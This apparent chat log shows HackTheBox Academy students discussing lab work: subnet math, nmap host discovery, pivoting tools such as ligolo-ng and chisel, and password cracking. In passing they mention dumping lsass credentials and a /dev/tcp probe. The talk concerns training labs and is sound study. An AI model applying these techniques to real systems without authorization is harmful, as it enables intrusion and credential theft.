Okay, reset the target and now it is working in the pwnbox
lets go !
Although I feel, my VPN is still facing some issue. But I will finish this module in pwnbox. Thank you all.
my notes say I used ||sortedcombined-knock-dnsrecon-fierce-reconng.txt|| but there are probably other files to try also.
Hello Someone did the NTLM RELAY ATTACKS Course? I wanna ask if they give Vulnerable machines in the course to test the attacks
in short yes, but if you are new to HTB Academy, every section in every module that showcases techniques, methodology or exploits that are intended to be replicated will have a target machine lab for it, and sections that just have "additional information only" most likely will not have a target machine or labs
I dumped the lsass with admin privilege
when trying to upload it to updog
i got that error
never mind
i fixed it out
feeling stupid sometimes XDD
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2898:4d63:7808:6639%4
IPv4 Address. . . . . . . . . . . : 172.16.5.35
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.16.5.1
Ethernet adapter Ethernet1 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::3dac:3388:e75f:b925%5
IPv4 Address. . . . . . . . . . . : 172.16.6.35
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :
yo guys this is the same network no?
172.16.5.x
172.16.6.x
review your networking basics
maybe you can talk gently
you are asking for a direct solution
I asked that I know the subnet mask is /16, so why then is the network /24
if you can guide some one thank you
if not
no need to talk
please formulate the question in a way we understand
what does this even mean?
/16 is not a subnet mask, it is a CIDR
a subnet mask is a 32 bits number
in the form X.X.X.X where X is 8 bits usually in decimal form
To figure out if two IPs exist on the same network, we can simply see if the Network Address for each of our IPs, which we can derive from the IPv4 address and Subnet Mask, is the same.
Network Address can be figured out by doing what is called Basic Anding of IPv4 address and Subnet Mask
If you are still having trouble then feel free to DM.
Isn't CIDR the same as a subnet mask but shortened? Windows and Cisco routers still use the old format but Linux uses CIDR to note masks
Ye
True.
255.255.0.0 == 11111111.11111111.00000000.00000000 in Binary == /16 in CIDR
Yep!
cidr is a model
strictly talking
a way of interpreting ip addresses
what happens is subnet mask agree with CIDR number
it is a convention
easier is to just see that /16 lets only the 3rd and 4th octet change, and from there use modulo such as 16%8=0 which leaves you with 0 bits reserved for the network mask, then 172.16.0.0 has to be the first IP in the network and 172.16.255.255 the last one
that is how i do it
with the modulo operation what you do is 2^(8-mod(CIDR,8))=2^8=256, but since IPs start at 0 it turns out to be 255; joining this with the fact that /16 (or lower until /8) only changes the last 2 octets you get the result
what are you trying to do bro?
hi guys, I'm trying to crack the Backup.vhd for the password hard module, I'm using the mutated password list. Am I on the right path using this wordlist?
you do not need the "anding" operation !
it is way easier
and that is?
okay. He will try whatever suits him the best
you are not doing and operations in real life lets be honest...
https://academy.hackthebox.com/module/34/section/306 this is a great source of information
lol
yea it works, ligolo-ng right?
yes
it is and way easier
waaaaaaaaaaaay
with listen-add
it's just I can ping but the host discovery is telling me 0 hosts are up
although for the pivot module you should learn the other tools in case you ever need them
rpivot is the only one i remember hating
iirc he was on socksoverrdp but idk now
i'd just stick to chisel+socat and ligolo-ng xD
dnscat was like suuuuuper slow, you say "dir" and it takes 2 days
oo i did hate that one too
isnt this academy teaching us to think out of the box
nothing beats ligolo-ng, I did the skills assessment with it and it was magical
if a tool is not working for me and i reach the same solution with other tool...
let's be fair there
but learning other tools
is better
ofc
define better
sure, knowing all the tools is advised, you never know what you're gonna run into
obviously everyone is starting to learn and use ligolo-ng, but the point i was trying to make is if it ever doesn't work you can fall back on those other tools
ah yes
totally agree
yo guys what's wrong with my nmap scan
┌──(shadowalker㉿kali)-[~]
└─$ nmap -sn 172.16.6.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 12:25 CDT
Nmap done: 256 IP addresses (0 hosts up) scanned in 105.20 seconds
-Pn -sT is what I used with nmap
coz maybe machine has pings disabled
hes tryna discover hosts xD
yup
Or firewall that can block ICMP traffic 👀
with Pn
i think it does the same as echo '' > /dev/tcp/ip/port?
not if you're checking for a single port or two
how many packets does it send
you can limit that if you want
i know
it's good to know how to be stealthy, of course, but that falls more under red teaming
also he can try ping sweep in the victim machine
no need for ligolo there tho
and looking into arp table
ping sweep first 🙂
nmap second
yea
but from this i assume he is trying to discover hosts
I did use both ways at different parts of the assessment for variety
i mean i've never used -sn flag
-Pn -n --disable-arp-ping is my goto
several ways as usual
I've used it, but in this case looking for ports you know will be open does the same thing
if you can upload files to the machine you can do it with nmap "locally"
88 and 445 are great ones to look for in an AD environment to get an overview of hosts
then more detailed scans
in CPTS i think we wont get a bunch of active hosts in the internal right?
no idea how big the environment is
but obviously would be less than a corporate network
most of the hosts are going to be internal
that was my question
actually
double pivot probably not much (one to two)
cool cool
not a problem with ligolo-ng, you can just stack pivots all you want
not if ligolo doesn't work 🙂 which is the point i was making earlier
the goat
but if i get +30 active hosts in the exam i think i will just give up xD
i wouldn't be surprised either if they added an attacking cross forest trusts
just finished the module
i'm saying there is like ten to 15 tops
if hypothetically that is the case, it's basically a test to sort out relevant information from useless one
was so fun, I learned a lot of things, thanks to anyone who helped me here
i know i know
im just nervous
how far into the path are you?
oki
73% CBBH
I haven't taken the exam or know anything about it so don't take what I say to heart
following the bunny track
ik
ah, I'm just going for CPTS
I might do the path later to get more into the web stuff, but CPTS is my goal right now
it'll just be the reverse for me
considering how much I hate web, probably not easy per se
Active Directory is my jam
you do not know you love it
